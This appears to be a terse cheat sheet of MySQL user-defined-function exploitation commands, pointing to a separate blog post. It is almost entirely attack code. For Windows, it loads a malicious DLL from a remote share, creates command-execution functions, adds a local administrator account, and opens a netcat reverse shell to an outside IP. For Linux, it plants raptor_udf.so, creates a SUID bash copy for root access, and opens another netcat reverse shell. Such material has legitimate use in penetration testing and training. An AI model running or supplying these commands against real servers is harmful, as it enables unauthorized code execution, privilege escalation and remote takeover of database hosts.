There is a TR blog post for this MySQL UDF Exploitations methodology.
select @@version_compile_os, @@version_compile_machine;select @@plugin_dir;select load_file('\\\\10.0.0.5\\share\\lib_mysqludf_sys_64.dll') into dumpfile "<Plugin-Directory>\\udf.dll";create function sys_bineval returns int soname 'udf.dll';create function sys_eval returns string soname 'udf.dll';select * from mysql.func where name = 'sys_bineval';select * from mysql.func where name = 'sys_eval';select sys_eval('dir C:\\Users\\4rch\\Desktop\\');select sys_exec("net user 4rchantos Passwd1 /add");select sys_exec("net localgroup Administrators 4rchantos /add");select sys_eval("net use X: \\\\10.0.0.5\\share /user:user passwd");select sys_eval("C:\\Users\\4rch\\Desktop\\nc.exe -e cmd.exe 192.168.49.125 80");select @@version_compile_os, @@version_compile_machine;show variables like '%plugin%';use mysql;create table foo(line blob);insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));select * from foo into dumpfile '<Plugin-Directory>/raptor_udf.so';create function do_system returns integer soname 'raptor_udf.so';select * from mysql.func;select do_system('<command>');select do_system('cp /bin/bash /tmp/4rch; chmod +xs /tmp/4rch');/tmp/4rch -pselect do_system('id > /tmp/out; chown raptor.raptor /tmp/out');\! shselect do_system('id > /var/www/output; chown www-data www-data /var/www/output');select do_system('nc 10.0.0.5 1337 -e /bin/bash');